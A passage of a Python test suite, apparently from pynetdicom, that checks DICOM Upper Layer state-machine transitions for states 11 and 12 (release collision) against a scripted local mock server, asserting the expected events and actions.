time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt4',
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt6',
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt7'
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt8'
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt9'
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', p_data_tf),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt10',
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt11'
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt12',
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rp),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt13',
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt14'
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-release-rp
('recv', None), # recv a-abort
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt15'
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_abort),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt16',
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt17',
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt18',
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt19',
]
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_ac), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt3', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rj), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt4', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('send', a_associate_rq), # trigger event
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:7] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
('Sta12', 'Evt6', 'AA-8'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt6'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt7'
]
def test_evt08(self):
"""Test Sta12 + Evt8."""
# Sta12 + Evt8 -> <ignore> -> Sta12
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:6] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10', 'Sta12'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:7] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13', 'Evt8'
]
def test_evt09(self):
"""Test Sta12 + Evt9."""
# Sta12 + Evt9 -> <ignore> -> Sta12
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('wait', 0.1),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
